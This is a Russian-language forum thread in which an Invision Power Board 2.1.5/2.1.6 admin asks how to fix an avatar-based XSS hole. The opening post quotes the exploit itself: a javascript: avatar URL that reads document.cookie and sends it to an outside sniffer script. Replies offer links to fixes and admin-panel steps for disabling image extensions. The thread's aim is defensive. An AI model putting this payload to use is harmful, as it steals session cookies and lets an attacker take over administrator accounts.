Как пофиксить баг в форумах IPB 2.1.5 и 2.1.6?

Как всем известно в форуме IPB 2.1.5 и 2.1.6 есть такая бага, которая позволяет получить ХЕШ через аватар, по средством:

javascript:x=document.cookie%3Bimg=new%20Image()%3Bimg.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27%2Bx/*.jpg*///.gif

для версии 2.1.6 нужно просто убрать теги

у мня просьба : Подскажите как профиксить эту багу? в каком модуме ошибка и как ее исправить?
Если можно ответ скинуть в личку.

Заранее благодарен.

 

В основном всё на сайт по безопасности расписано, где, чего, в каком модуле...поищи

 

Тебе вот СЮДА

На даном форуме дыры находят,а не заделывают...

 

http://www.ibresource.ru/forums/index.php?s=&showtopic=31531&view=findpost&p=187743

 

спс я нашол там одну темку , но чет не помогает, может эта бага еще осталась из версии 2.0.*

 

Вот последняя известная бага, как пофиксить здесь.
http://www.ibresource.ru/forums/index.php?showtopic=31531&pid=187743&st=0%EF%BF%BDentry18774

 

Да эти я заделал , я никак немогу разобраться с той что через аватар

 

Если ты хочешь запретить теги, ну то есть использование в них изображений. В которых можно поместить сниффер.

1.Заходишь в админу
2.Идешь в Настройки(В меню выбора сферху)
3.В "системных настройках" выбираещь "все основные настройки"
4.Переходишь в Темы, Сообщения и Опросы
5.В "Создание сообщения" находишь "Разрешенные к публикации в сообщениях расширения файлов изображений" и просто удаляешь все разрешения которые там стоят.

 

хм... а разве хэш воруется не солёный? тоесть от него же толку нету это просто активная хсс.... только кукизы тырить...

 

bl4ck-cat
С этим кукисом можно только под Админом зайти. Ну а топикстартер не хочет этого, т.к. злоумышленик может по форуму как админ лазить, все редактировать и т.д.

 

кто нить знает как это долб**** дырку закрыть?